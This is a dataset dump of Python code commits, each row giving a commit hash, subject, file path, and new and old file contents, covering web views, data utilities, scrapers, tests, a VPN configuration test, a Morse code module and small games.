commit stringlengths 40 40 | subject stringlengths 1 1.49k | old_file stringlengths 4 311 | new_file stringlengths 4 311 | new_contents stringlengths 1 29.8k | old_contents stringlengths 0 9.9k | lang stringclasses 3 values | proba float64 0 1 |
|---|---|---|---|---|---|---|---|
c15c4a663c257cad6763cf92c50b7ad706017c74 | Remove extraneous imports in the base view package | evesrp/views/__init__.py | evesrp/views/__init__.py | from flask import render_template
from flask.ext.login import login_required
from .. import app
@app.route('/')
@login_required
def index():
return render_template('base.html')
| from collections import OrderedDict
from urllib.parse import urlparse
import re
from flask import render_template, redirect, url_for, request, abort, jsonify,\
flash, Markup, session
from flask.views import View
from flask.ext.login import login_user, login_required, logout_user, \
current_user
from flask.ext.wtf import Form
from flask.ext.principal import identity_changed, AnonymousIdentity
from sqlalchemy.orm.exc import NoResultFound
from wtforms.fields import StringField, PasswordField, SelectField, \
SubmitField, TextAreaField, HiddenField
from wtforms.fields.html5 import URLField, DecimalField
from wtforms.widgets import HiddenInput
from wtforms.validators import InputRequired, ValidationError, AnyOf, URL
from .. import app, auth_methods, db, requests_session, killmail_sources
from ..auth import SubmitRequestsPermission, ReviewRequestsPermission, \
PayoutRequestsPermission, admin_permission
from ..auth.models import User, Group, Division, Pilot
from ..models import Request, Modifier, Action
@app.route('/')
@login_required
def index():
return render_template('base.html')
| Python | 0 |
d40b4c250f7d1c0c6a6c198b3e1ea69e0049830e | Create syb.py | syb.py | syb.py | # -*- coding: utf-8 -*-
"""
Star Yuuki Bot
~~~~~~~~~~~
LineClient for sending and receiving message from LINE server.
Copyright: (c) 2015 SuperSonic Software Foundation and Star Inc.
Website:
SuperSonic Software Foundation: http://supersonic-org.cf
Star Inc.: http://startw.cf
License: Mozilla Public License 2.0
"""
print "Come Soon..."
| Python | 0.000039 | |
100d30d4f541541a63e4b05adfbd9644d70af453 | Add the lovecat utils. | src/crosscat/lovecat.py | src/crosscat/lovecat.py | # -*- coding: utf-8 -*-
# Copyright (c) 2015-2016 MIT Probabilistic Computing Project
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
def _create_metadata(state):
"""Create M_c from cgpm.state.State"""
T = state.X
outputs = state.outputs
cctypes = state.cctypes()
distargs = state.distargs()
assert len(T) == len(outputs) == len(cctypes) == len(distargs)
assert all(c in ['normal', 'categorical'] for c in cctypes)
ncols = len(outputs)
def create_metadata_numerical():
return {
unicode('modeltype'): unicode('normal_inverse_gamma'),
unicode('value_to_code'): {},
unicode('code_to_value'): {},
}
def create_metadata_categorical(col, k):
categories = filter(lambda v: not np.isnan(v), sorted(set(T[col])))
assert all(0 <= c < k for c in categories)
codes = [unicode('%d') % (c,) for c in categories]
ncodes = range(len(codes))
return {
unicode('modeltype'):
unicode('symmetric_dirichlet_discrete'),
unicode('value_to_code'):
dict(zip(map(unicode, ncodes), codes)),
unicode('code_to_value'):
dict(zip(codes, ncodes)),
}
column_names = [unicode('c%d') % (i,) for i in outputs]
# Convert all numerical datatypes to normal for lovecat.
column_metadata = [
create_metadata_numerical() if cctype != 'categorical' else\
create_metadata_categorical(output, distarg['k'])
for output, cctype, distarg in zip(outputs, cctypes, distargs)
]
return {
unicode('name_to_idx'):
dict(zip(column_names, range(ncols))),
unicode('idx_to_name'):
dict(zip(map(unicode, range(ncols)), column_names)),
unicode('column_metadata'):
column_metadata,
}
def _crosscat_data(state, M_c):
"""Create T from cgpm.state.State"""
T = state.X
def crosscat_value_to_code(val, col):
if np.isnan(val):
return val
# For hysterical raisins, code_to_value and value_to_code are
# backwards, so to convert from a raw value to a crosscat value we
# need to do code->value.
lookup = M_c['column_metadata'][col]['code_to_value']
if lookup:
assert unicode(int(val)) in lookup
return float(lookup[unicode(int(val))])
else:
return val
ordering = sorted(T.keys())
rows = range(len(T[ordering[0]]))
return [[crosscat_value_to_code(T[col][row], i) for (i, col) in
enumerate(ordering)] for row in rows]
def _crosscat_X_D(state, M_c):
"""Create X_D from cgpm.state.State"""
view_assignments = state.Zv().values()
views_unique = sorted(set(view_assignments))
cluster_assignments = [state.views[v].Zr().values() for v in views_unique]
cluster_assignments_unique = [sorted(set(assgn))
for assgn in cluster_assignments]
cluster_assignments_to_code = [{k:i for (i,k) in enumerate(assgn)}
for assgn in cluster_assignments_unique]
cluster_assignments_remapped = [
[coder[v] for v in assgn] for (coder, assgn)
in zip(cluster_assignments_to_code, cluster_assignments)]
return cluster_assignments_remapped
def _crosscat_X_L(state, X_D, M_c):
"""Create X_L from cgpm.state.State"""
# -- Generates X_L['column_hypers'] --
def column_hypers_numerical(index, hypers):
assert state.cctypes()[index] != 'categorical'
return {
unicode('fixed'): 0.0,
unicode('mu'): hypers['m'],
unicode('nu'): hypers['nu'],
unicode('r'): hypers['r'],
unicode('s'): hypers['s'],
}
def column_hypers_categorical(index, hypers):
assert state.cctypes()[index] == 'categorical'
K = len(M_c['column_metadata'][index]['code_to_value'])
assert K > 0
return {
unicode('fixed'): 0.0,
unicode('dirichlet_alpha'): hypers['alpha'],
unicode('K'): K
}
# Retrieve the column_hypers.
column_hypers = [
column_hypers_numerical(i, state.dims()[i].hypers)
if cctype != 'categorical'
else column_hypers_categorical(i, state.dims()[i].hypers)
for i, cctype in enumerate(state.cctypes())
]
# -- Generates X_L['column_partition'] --
view_assignments = state.Zv().values()
views_unique = sorted(set(view_assignments))
views_to_code = {v:i for (i,v) in enumerate(views_unique)}
views_remapped = [views_to_code[v] for v in view_assignments]
counts = list(np.bincount(views_remapped))
assert 0 not in counts
column_partition = {
unicode('assignments'): views_remapped,
unicode('counts'): counts,
unicode('hypers'): {unicode('alpha'): state.alpha()}
}
# -- Generates X_L['view_state'] --
def view_state(v):
view = state.views[v]
row_partition = X_D[views_to_code[v]]
# Generate X_L['view_state'][v]['column_component_suffstats']
numcategories = len(set(row_partition))
column_component_suffstats = [
[{} for c in xrange(numcategories)]
for d in view.dims]
# Generate X_L['view_state'][v]['column_names']
column_names = \
[unicode('c%d' % (o,)) for o in state.views[0].outputs[1:]]
# Generate X_L['view_state'][v]['row_partition_model']
counts = list(np.bincount(row_partition))
assert 0 not in counts
return {
unicode('column_component_suffstats'):
column_component_suffstats,
unicode('column_names'):
column_names,
unicode('row_partition_model'): {
unicode('counts'): counts,
unicode('hypers'): {unicode('alpha'): view.alpha()}
}
}
view_states = [view_state(v) for v in state.views.keys()]
# XXX TODO convert me to dictionary.
return {
unicode('column_hypers'): column_hypers,
unicode('column_partition'): column_partition,
unicode('view_state'): view_states
}
| Python | 0.000001 | |
774877893b9f94711b717d01b896deefe65eb211 | create file | app.py | app.py | """
@import rdflib external lib
"""
import rdflib
jsonldData = open("LearningObjectsExpanded.jsonld").read()
queryData = open("findRecommendations.query").read()
graph = rdflib.Graph()
graph.parse(data=jsonldData,format='json-ld')
results = graph.query(queryData)
for result in results:
print(result)
| Python | 0.000003 | |
921221e4ad7d74b6f9d8b0b75417fe84fd01715f | Add script to concatenate all titers to one file tracking source/passage Fixes #76 | tdb/concatenate.py | tdb/concatenate.py | import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--files', nargs='*', default=[], help="tsvs that will be concatenated")
parser.add_argument('-o', '--output', type=str, default="data/titers_complete.tsv")
def concat(files,out):
with open(out, 'w') as o:
for filename in files:
print "Concatenating and annotating %s into %s." % (filename, out)
if "cdc" in filename.lower():
source = "cdc"
elif "crick" in filename.lower():
source = "crick"
else:
source = "none"
if "egg" in filename.lower():
passage = "egg"
elif "cell" in filename.lower():
passage = "egg"
else:
passage = "none"
with open(filename, 'r') as f:
for line in f.readlines():
print line
line = line.strip()
l = "%s\t%s\t%s\n" % (line, source, passage)
o.write(l)
if __name__=="__main__":
args = parser.parse_args()
concat(args.files, args.output)
| Python | 0.000003 | |
c26d570e949483224b694574120e37a215dcc348 | Add dataframewriter api example to python graphene (#4520) | ppml/trusted-big-data-ml/python/docker-graphene/examples/sql_dataframe_writer_example.py | ppml/trusted-big-data-ml/python/docker-graphene/examples/sql_dataframe_writer_example.py | from pyspark.sql.functions import *
from pyspark.sql import Row, Window, SparkSession, SQLContext
from pyspark.sql.types import IntegerType, FloatType, StringType
from pyspark.sql import functions as F
from pyspark.sql.functions import rank, min, col, mean
import random
import os
import tempfile
def sql_dataframe_writer_api(spark):
print("Start running dataframe writer API")
sc = spark.sparkContext
sqlContext = SQLContext(sc)
df = spark.createDataFrame([(2, "Alice"), (5, "Bob")], ["age", "name"])
# bucketBy and saveAsTable
# make sure that this is no work/spark-warehouse/bucketed_table/ under current path
df.write.format('parquet').bucketBy(100, 'age', 'name').mode("overwrite").saveAsTable('bucketed_table', path="work/spark-warehouse/bucketed_table/")
print("bucketBy and saveAsTable API finished")
# csv and option
df = spark.createDataFrame([(2, "Alice"), (5, "Bob")], ["age", "name"])
df.write.option('header','true').csv(os.path.join(tempfile.mkdtemp(), 'data'))
print("csv and option API finished")
# format
df.write.format('json').save(os.path.join(tempfile.mkdtemp(), 'data'))
print("format API finished")
# insertInto
df2 = spark.createDataFrame([(3, "Alice")], ["age", "name"])
df2.write.insertInto("bucketed_table")
print("insertInto API finished")
# jdbc
# json
df.write.json(os.path.join(tempfile.mkdtemp(), 'data'))
print("json API finished")
# mode
df.write.mode('append').parquet(os.path.join(tempfile.mkdtemp(), 'data'))
print("mode API finished")
# orc
orc_df = spark.read.orc('/ppml/trusted-big-data-ml/work/spark-2.4.6/python/test_support/sql/orc_partitioned')
orc_df.write.orc(os.path.join(tempfile.mkdtemp(), 'data'))
print("orc API finished")
# parquet
df.write.parquet(os.path.join(tempfile.mkdtemp(), 'data'))
print("parquet API finished")
# partitionBy
df.write.partitionBy('age').parquet(os.path.join(tempfile.mkdtemp(), 'data'))
print("partitionBy API finished")
# save
df.write.mode("append").save(os.path.join(tempfile.mkdtemp(), 'data'))
print("save API finished")
# sortBy
# make sure that this is no work/spark-warehouse/sorted_bucketed_table/ under current path
df.write.format('parquet').bucketBy(100, 'name').sortBy('age').mode("overwrite").saveAsTable('sorted_bucketed_table', path="work/spark-warehouse/sorted_bucketed_table/")
print("sortBy API finished")
# text
df = spark.createDataFrame([1.0, 2.0, 3.0], StringType())
df.write.text(os.path.join(tempfile.mkdtemp(), 'data'))
print("text API finished")
print("Finish running dataframe writer API")
if __name__ == "__main__":
spark = SparkSession \
.builder \
.appName("Python Spark SQL Dataframe Writer example") \
.config("spark.some.config.option", "some-value") \
.getOrCreate()
sql_dataframe_writer_api(spark)
| Python | 0 | |
ad489edc8059b75d9ec78d0aeb03ac3592b93923 | Add Federal Labor Relations Authority. | inspectors/flra.py | inspectors/flra.py | #!/usr/bin/env python
import datetime
import logging
import os
from urllib.parse import urljoin
from bs4 import BeautifulSoup
from utils import utils, inspector
# https://www.flra.gov/OIG
# Oldest report: 1999
# options:
# standard since/year options for a year range to fetch from.
#
# Notes for IG's web team:
#
AUDIT_REPORTS_URL = "https://www.flra.gov/IG_audit-reports"
INTERNAL_REVIEWS_URL = "https://www.flra.gov/IG_internal-reviews"
QA_REVIEWS_URL = "https://www.flra.gov/OIG_QA_Reviews"
SEMIANNUAL_REPORTS_URL = "https://www.flra.gov/IG_semi-annual_reports"
def run(options):
year_range = inspector.year_range(options)
# Pull the reports
for url in [AUDIT_REPORTS_URL, INTERNAL_REVIEWS_URL, QA_REVIEWS_URL, SEMIANNUAL_REPORTS_URL]:
doc = BeautifulSoup(utils.download(url))
results = doc.select("div.node ul li")
for result in results:
report = report_from(result, url, year_range)
if report:
inspector.save_report(report)
def report_from(result, landing_url, year_range):
title = result.text.strip()
if 'Non-Public Report' in title:
unreleased = True
report_url = None
report_id = "-".join(title.split())
else:
unreleased = False
link = result.find("a")
# Some reports have incorrect relative paths
relative_report_url = link.get('href').replace("../", "")
report_url = urljoin(landing_url, relative_report_url)
report_filename = report_url.split("/")[-1]
report_id, _ = os.path.splitext(report_filename)
estimated_date = False
try:
published_on = datetime.datetime.strptime(title, '%B %Y')
except ValueError:
# For reports where we can only find the year, set them to Nov 1st of that year
published_on_year = int(result.find_previous("p").text.strip())
published_on = datetime.datetime(published_on_year, 11, 1)
estimated_date = True
if published_on.year not in year_range:
logging.debug("[%s] Skipping, not in requested range." % report_url)
return
report = {
'inspector': 'flra',
'inspector_url': 'https://www.flra.gov/OIG',
'agency': 'flra',
'agency_name': 'Federal Labor Relations Authority',
'file_type': 'pdf',
'report_id': report_id,
'url': report_url,
'title': title,
'published_on': datetime.datetime.strftime(published_on, "%Y-%m-%d"),
}
if estimated_date:
report['estimated_date'] = estimated_date
if unreleased:
report['unreleased'] = unreleased
report['landing_url'] = landing_url
return report
utils.run(run) if (__name__ == "__main__") else None
| Python | 0 | |
241cc8fc668b9f6c38d23a97d9ff28cc4c481bf3 | Create github_watchdog,py | github_watchdog.py | github_watchdog.py | #!/usr/bin/bash
| Python | 0.000126 | |
45af6f13e302fb4e790f8ec5a5730f25c6a9450b | add new segmenter debugging script | kraken/contrib/heatmap_overlay.py | kraken/contrib/heatmap_overlay.py | #! /usr/bin/env python
"""
Produces semi-transparent neural segmenter output overlays
"""
import sys
import torch
import numpy as np
from PIL import Image
from kraken.lib import segmentation, vgsl, dataset
import torch.nn.functional as F
from typing import *
import glob
from os.path import splitext, exists
model = vgsl.TorchVGSLModel.load_model(sys.argv[1])
model.eval()
batch, channels, height, width = model.input
transforms = dataset.generate_input_transforms(batch, height, width, channels, 0, valid_norm=False)
imgs = sys.argv[2:]
torch.set_num_threads(1)
for img in imgs:
print(img)
im = Image.open(img)
with torch.no_grad():
o = model.nn(transforms(im).unsqueeze(0))
o = F.interpolate(o, size=im.size[::-1])
o = o.squeeze().numpy()
heat = Image.fromarray((o[1]*255).astype('uint8'))
heat.save(splitext(img)[0] + '.heat.png')
overlay = Image.new('RGBA', im.size, (0, 130, 200, 255))
Image.composite(overlay, im.convert('RGBA'), heat).save(splitext(img)[0] + '.overlay.png')
del o
del im
| Python | 0 | |
d39a3bae3f6ca66df044e725cd164082170f4ec7 | Modify the config file. | snippet/lib/python/config.py | snippet/lib/python/config.py | # coding: utf-8
from oslo_config import cfg
from oslo_log import log
CONF = cfg.CONF
_ROOTS = ["root"]
_DEFAULT_LOG_LEVELS = ['root=INFO']
_DEFAULT_LOG_FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
def parse_args(argv, project, version=None, default_config_files=None,
default_log_format=None, default_log_levels=None):
if project not in _ROOTS:
_DEFAULT_LOG_LEVELS.append('%s=INFO' % project)
_ROOTS.append(project)
log_fmt = default_log_format if default_log_format else _DEFAULT_LOG_FORMAT
log_lvl = default_log_levels if default_log_levels else _DEFAULT_LOG_LEVELS
log.set_defaults(log_fmt, log_lvl)
log.register_options(CONF)
# (TODO): Configure the options of the other libraries, which must be called
# before parsing the configuration file.
CONF(argv[1:], project=project, version=version,
default_config_files=default_config_files)
| Python | 0 | |
be2f50aae308377dbabd66b5ec78ffb2bd8ae218 | Add tse_number as index | politicos/migrations/versions/488fc5ad2ffa_political_party_add_tse_number_as_index.py | politicos/migrations/versions/488fc5ad2ffa_political_party_add_tse_number_as_index.py | """political party: add tse_number as index
Revision ID: 488fc5ad2ffa
Revises: 192bd4ccdacb
Create Date: 2015-07-08 13:44:38.208146
"""
# revision identifiers, used by Alembic.
revision = '488fc5ad2ffa'
down_revision = '192bd4ccdacb'
from alembic import op
def upgrade():
op.create_index('idx_tse_number', 'political_party', ['tse_number'])
def downgrade():
op.drop_index('idx_tse_number', 'political_party')
| Python | 0.002058 | |
96ecfaa423b2d7829fcda0e56e9adba41a4c6819 | Add unit_tests/s2s_vpn | unit_tests/s2s_vpn.py | unit_tests/s2s_vpn.py | import logging
import fmcapi
import time
def test_ftds2svpns(fmc):
logging.info('Testing FTDS2SVPNs class. Requires at least one registered device.')
starttime = str(int(time.time()))
namer = f'_fmcapi_test_{starttime}'
# Create a Site2Site VPN Policy
vpnpol1 = fmcapi.FTDS2SVPNs(fmc=fmc, name=namer)
vpnpol1.topologyType = "POINT_TO_POINT"
vpnpol1.ikeV1Enabled = True
vpnpol1.ikeV2Enabled = False
vpnpol1.post()
vpnpol1.get()
# Create some network objects for the encryption domains
obj1 = fmcapi.Networks(fmc=fmc)
obj1.name = '_net1_site1'
obj1.value = '10.255.0.0/24'
obj1.post()
time.sleep(1)
obj2 = fmcapi.Networks(fmc=fmc)
obj2.name = '_net2_site1'
obj2.value = '10.255.1.0/24'
obj2.post()
time.sleep(1)
obj3 = fmcapi.Networks(fmc=fmc)
obj3.name = '_net1_site2'
obj3.value = '10.255.2.0/24'
obj3.post()
time.sleep(1)
# Create Phase 1 settings
# There is no way to search by name, so we just find the iksettings object inside the vpn policy
ike1_json = fmcapi.IKESettings(fmc=fmc)
ike1_json.vpn_policy(pol_name=namer)
items = ike1_json.get()['items'][0]
ike1 = fmcapi.IKESettings(fmc=fmc)
ike1.vpn_policy(pol_name=namer)
ike1.id = items['id']
ike1.get()
ike1.ike_policy(pol_name="preshared_sha_aes192_dh5_10")
ike1.put()
#Create Phase 2 settings
# There is no way to search by name, so we just find the ipsecsettings object inside the vpn policy
ipsec1_json = fmcapi.IPSecSettings(fmc=fmc)
ipsec1_json.vpn_policy(pol_name=namer)
items = ipsec1_json.get()['items'][0]
ipsec1 = fmcapi.IPSecSettings(fmc=fmc)
ipsec1.vpn_policy(pol_name=namer)
ipsec1.id = items['id']
ipsec1.get()
ipsec1.ipsec_policy(pol_name="tunnel_aes256_sha")
ipsec1.put()
#Add vpn peers
#FTD in HA mode should use the name of logical HA device
endp1 = fmcapi.Endpoints(fmc=fmc)
endp1.peerType = "PEER"
endp1.connectionType = "BIDIRECTIONAL"
endp1.vpn_policy(pol_name=namer)
endp1.endpoint(action='add', device_name="_ha_name")
endp1.vpn_interface(device_name='_ha_name', ifname="OUTSIDE1")
endp1.encryption_domain(action='add', names=[
"_net1_site1", "_net2_site1"])
endp2 = fmcapi.Endpoints(fmc=fmc)
endp2.peerType = "PEER"
endp2.connectionType = "BIDIRECTIONAL"
endp2.vpn_policy(pol_name=namer)
endp2.endpoint(action='add', device_name="_device_name")
endp2.vpn_interface(device_name='device_name', ifname="OUTSIDE1")
endp2.encryption_domain(action='add', names=[
"_net1_site2"])
endp1.post()
endp2.post()
time.sleep(30)
vpnpol1.delete()
obj1.delete()
obj2.delete()
obj3.delete() | Python | 0.000001 | |
75756f20d4b63daa8425609620e4b32dcb9faab4 | Add cryptography unit with morse code functions | units/cryptography.py | units/cryptography.py |
from .errors import UnitOutputError
character_to_morse = {
'A': ".-", 'B': "-...", 'C': "-.-.", 'D': "-..", 'E': '.', 'F': "..-.", 'G': "--.", 'H': "....",
'I': "..", 'J': ".---", 'K': "-.-", 'L': ".-..", 'M': "--", 'N': "-.", 'O': "---", 'P': ".--.",
'Q': "--.-", 'R': ".-.", 'S': "...", 'T': '-', 'U': "..-", 'V': "...-", 'W': ".--", 'X': "-..-",
'Y': "-.--", 'Z': "--..", '0': "----", '1': ".----", '2': "..---", '3': "...--", '4': "....-",
'5': ".....", '6': "-....", '7': "--...", '8': "---..", '9': "----.", '.': ".-.-.-", ',': "--..--",
':': "---...", '?': "..--..", "'": ".---.", '-': "-....-", '/': "-..-.", '!': "-.-.--",
'(': "-.--.", ')': "-.--.-", '&': ".-...", ';': "-.-.-.", '=': "-...-", '+': ".-.-.",
'_': "..--.-", '"': ".-..-.", '$': "...-..-", '@': ".--.-.", ' ': '/'
}
morse_to_character = {value: key for key, value in character_to_morse.items()}
def encode_morse_code(message):
try:
return ' '.join(character_to_morse[character] for character in message.upper())
except KeyError as e:
raise UnitOutputError(f"Unable to encode {e}")
def decode_morse_code(message):
try:
return ' '.join(''.join(morse_to_character[character] for character in word.split(' ')) for word in message.split(" / "))
except KeyError as e:
raise UnitOutputError(f"Unable to decode {e}")
| Python | 0.000001 | |
93b3cfb5dd465f956fa6c9ceb09be430684c85ae | Add two pass solution | leetcode/q019/solution.py | leetcode/q019/solution.py | """
Given a linked list, remove the n-th node from the end of list and return its head.
Example:
Given linked list: 1->2->3->4->5, and n = 2.
After removing the second node from the end, the linked list becomes 1->2->3->5.
Note:
Given n will always be valid.
"""
# Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:
d = 1
current = head.next
while current:
d += 1
current = current.next
removal_index = d - n
if removal_index <= 0:
return head.next
counter = 1
prior = head
current = head.next
while counter < removal_index:
prior = current
current = prior.next
counter += 1
if current.next is None:
prior.next = None
else:
following = current.next
prior.next = following
return head
| Python | 0.000031 | |
295823afe17cedaa1934afbcd19d955974089c63 | Add producer written in Python | python/send.py | python/send.py | #!/usr/bin/env python
import pika
# Host in which RabbitMQ is running.
HOST = 'localhost'
# Name of the queue.
QUEUE = 'pages'
# The message to send.
MESSAGE = 'Hi there! This is a test message =)'
# Getting the connection using pika.
# Creating the channel.
# Declaring the queue.
connection = pika.BlockingConnection(pika.ConnectionParameters(HOST))
channel = connection.channel()
channel.queue_declare(queue=QUEUE)
# Sends the 'MESSAGE' to the queue.
# Default empty 'exchange' with 'routing_key' equal to the queue name
# will route the message to that queue.
channel.publish(exchange='', routing_key=QUEUE, body=MESSAGE)
# The connection is closed.
connection.close()
| Python | 0.000005 | |
04c8b38ac43c84abe64858cfd22a721e803b87eb | add mocked tests for internal /run folder | tests/core/test_run_files.py | tests/core/test_run_files.py | # stdlib
import os
import shlex
import signal
import subprocess
import time
import unittest
# 3p
import mock
from nose.plugins.attrib import attr
# Mock gettempdir for testing
import tempfile; tempfile.gettempdir = mock.Mock(return_value='/a/test/tmp/dir')
# project
# Mock _windows_commondata_path for testing
import config; config._windows_commondata_path = mock.Mock(return_value='./windows_commondata')
from utils.pidfile import PidFile
from checks.check_status import AgentStatus
class TestRunFiles(unittest.TestCase):
""" Tests that runfiles (.pid, .sock, .pickle etc.) are written to internal agent folders"""
# Mac run directory expected location
_my_dir = os.path.dirname(os.path.abspath(__file__))
_mac_run_dir = '/'.join(_my_dir.split('/')[:-4])
def setUp(self):
self.agent_daemon = None
def tearDown(self):
if self.agent_daemon:
args = shlex.split('python agent.py stop')
subprocess.Popen(args).communicate()
@mock.patch('utils.platform.Platform.is_win32', return_value=True)
def test_agent_status_pickle_file_win32(self, *mocks):
''' Test pickle file location on win32 '''
expected_path = os.path.join('.', 'windows_commondata', 'Datadog', 'AgentStatus.pickle')
# check AgentStatus pickle created
self.assertEqual(AgentStatus._get_pickle_path(), expected_path)
@mock.patch('utils.pidfile.PidFile.get_dir', return_value=_mac_run_dir)
@mock.patch('utils.platform.Platform.is_win32', return_value=False)
@mock.patch('utils.platform.Platform.is_mac', return_value=True)
def test_agent_status_pickle_file_mac_dmg(self, *mocks):
''' Test pickle file location when running a Mac DMG install '''
expected_path = os.path.join(self._mac_run_dir, 'AgentStatus.pickle')
self.assertEqual(AgentStatus._get_pickle_path(), expected_path)
@mock.patch('utils.platform.Platform.is_win32', return_value=False)
@mock.patch('utils.platform.Platform.is_mac', return_value=True)
def test_agent_status_pickle_file_mac_source(self, *mocks):
''' Test pickle file location when running a Mac source install '''
expected_path = os.path.join('/a/test/tmp/dir', 'AgentStatus.pickle')
self.assertEqual(AgentStatus._get_pickle_path(), expected_path)
| Python | 0 | |
cf9299aad62828f1cd116403076b2a6b086721d8 | add meta utilities | flask_ember/util/meta.py | flask_ember/util/meta.py | import inspect
def get_class_fields(klass, predicate=None):
return [(name, field) for name, field in klass.__dict__.items()
if (predicate(name, field) if predicate else True)]
def get_fields(klass, predicate=None):
fields = list()
for base in inspect.getmro(klass)[::-1]:
fields.extend(get_class_fields(base, predicate))
return fields
def get_methods(klass):
return get_fields(klass, lambda name, field: inspect.isfunction(field))
| Python | 0.000001 | |
481a920fe89ea7f0e518b8cf815f966715b20ca3 | add new package : activemq (#14142) | var/spack/repos/builtin/packages/activemq/package.py | var/spack/repos/builtin/packages/activemq/package.py | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Activemq(Package):
"""
Apache ActiveMQ is a high performance Apache 2.0 licensed Message Broker
and JMS 1.1 implementation.
"""
homepage = "https://archive.apache.org/dist/activemq"
url = "https://archive.apache.org/dist/activemq/5.14.0/apache-activemq-5.14.0-bin.tar.gz"
version('5.14.0', sha256='81c623465af277dd50a141a8d9308d6ec8e1b78d9019b845873dc12d117aa9a6')
def install(self, spec, prefix):
install_tree('.', prefix)
| Python | 0 | |
6b9adf9f00b481562cedf2debc5aede947734744 | remove dot | addons/account_analytic_analysis/cron_account_analytic_account.py | addons/account_analytic_analysis/cron_account_analytic_account.py | #!/usr/bin/env python
from osv import osv
from mako.template import Template
import time
try:
import cStringIO as StringIO
except ImportError:
import StringIO
import tools
MAKO_TEMPLATE = u"""Hello ${user.name},
Here is a list of contracts that have to be renewed for two
possible reasons:
- the end of contract date is passed
- the customer consumed more hours than expected
Can you contact the customer in order to sell a new or renew its contract.
The contract has been set with a pending state, can you update the status
of the analytic account following this rule:
- Set Done: if the customer does not want to renew
- Set Open: if the customer purchased an extra contract
Here is the list of contracts to renew:
% for partner, accounts in partners.iteritems():
* ${partner.name}
% for account in accounts:
- Name: ${account.name}
% if account.quantity_max != 0.0:
- Quantity: ${account.quantity}/${account.quantity_max} hours
% endif
- Dates: ${account.date_start} to ${account.date and account.date or '???'}
- Contacts:
${account.partner_id.name}, ${account.partner_id.phone}, ${account.partner_id.email}
% endfor
% endfor
You can use the report in the menu: Sales > Invoicing > Overdue Accounts
Regards,
--
OpenERP
"""
class analytic_account(osv.osv):
_inherit = 'account.analytic.account'
def cron_account_analytic_account(self, cr, uid, context=None):
domain = [
('name', 'not ilike', 'maintenance'),
('partner_id', '!=', False),
('user_id', '!=', False),
('user_id.user_email', '!=', False),
('state', 'in', ('draft', 'open')),
'|', ('date', '<', time.strftime('%Y-%m-%d')), ('date', '=', False),
]
account_ids = self.search(cr, uid, domain, context=context, order='name asc')
accounts = self.browse(cr, uid, account_ids, context=context)
users = dict()
for account in accounts:
users.setdefault(account.user_id, dict()).setdefault(account.partner_id, []).append(account)
account.write({'state' : 'pending'}, context=context)
for user, data in users.iteritems():
subject = '[OPENERP] Reporting: Analytic Accounts'
body = Template(MAKO_TEMPLATE).render_unicode(user=user, partners=data)
tools.email_send('noreply@openerp.com', [user.user_email, ], subject, body)
return True
analytic_account()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| #!/usr/bin/env python
from osv import osv
from mako.template import Template
import time
try:
import cStringIO as StringIO
except ImportError:
import StringIO
import tools
MAKO_TEMPLATE = u"""Hello ${user.name},
Here is a list of contracts that have to be renewed for two
possible reasons:
- the end of contract date is passed
- the customer consumed more hours than expected
Can you contact the customer in order to sell a new or renew its contract.
The contract has been set with a pending state, can you update the status
of the analytic account following this rule:
- Set Done: if the customer does not want to renew
- Set Open: if the customer purchased an extra contract
Here is the list of contracts to renew:
% for partner, accounts in partners.iteritems():
* ${partner.name}
% for account in accounts:
- Name: ${account.name}
% if account.quantity_max != 0.0:
- Quantity: ${account.quantity}/${account.quantity_max} hours
% endif
- Dates: ${account.date_start} to ${account.date and account.date or '???'}
- Contacts:
. ${account.partner_id.name}, ${account.partner_id.phone}, ${account.partner_id.email}
% endfor
% endfor
You can use the report in the menu: Sales > Invoicing > Overdue Accounts
Regards,
--
OpenERP
"""
class analytic_account(osv.osv):
_inherit = 'account.analytic.account'
def cron_account_analytic_account(self, cr, uid, context=None):
domain = [
('name', 'not ilike', 'maintenance'),
('partner_id', '!=', False),
('user_id', '!=', False),
('user_id.user_email', '!=', False),
('state', 'in', ('draft', 'open')),
'|', ('date', '<', time.strftime('%Y-%m-%d')), ('date', '=', False),
]
account_ids = self.search(cr, uid, domain, context=context, order='name asc')
accounts = self.browse(cr, uid, account_ids, context=context)
users = dict()
for account in accounts:
users.setdefault(account.user_id, dict()).setdefault(account.partner_id, []).append(account)
account.write({'state' : 'pending'}, context=context)
for user, data in users.iteritems():
subject = '[OPENERP] Reporting: Analytic Accounts'
body = Template(MAKO_TEMPLATE).render_unicode(user=user, partners=data)
tools.email_send('noreply@openerp.com', [user.user_email, ], subject, body)
return True
analytic_account()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| Python | 0.000012 |
2aa7a6260d9d5a74ee81677be2bd5f97774f9116 | Add tests for internal gregorian functions. | calexicon/internal/tests/test_gregorian.py | calexicon/internal/tests/test_gregorian.py | import unittest
from calexicon.internal.gregorian import is_gregorian_leap_year
class TestGregorian(unittest.TestCase):
    """Unit tests for the internal Gregorian calendar helpers."""

    def test_is_gregorian_leap_year(self):
        # Century years are leap only when divisible by 400.
        for year in (2000, 1984):
            self.assertTrue(is_gregorian_leap_year(year))
        for year in (1900, 1901):
            self.assertFalse(is_gregorian_leap_year(year))
9524230502819a3bfaa670e344e6760f61afbcbe | Create 2048.py | 2048.py | 2048.py | #coding by forsenlol
#!/usr/bin/env python
import pygame
from random import randint
from pygame import font
pygame.font.init()
class Window:
    """Top-level 2048 game window: owns the pygame screen and the 4x4 board.

    NOTE: the attributes below are *class* attributes.  ``play_block`` (the
    flattened 4x4 board, row-major, 0 == empty cell) is deliberately shared
    between the single ``Window`` instance and the throwaway ``Square``
    instances created per event, so it must stay class-level and must only
    ever be mutated in place (never rebound).
    """
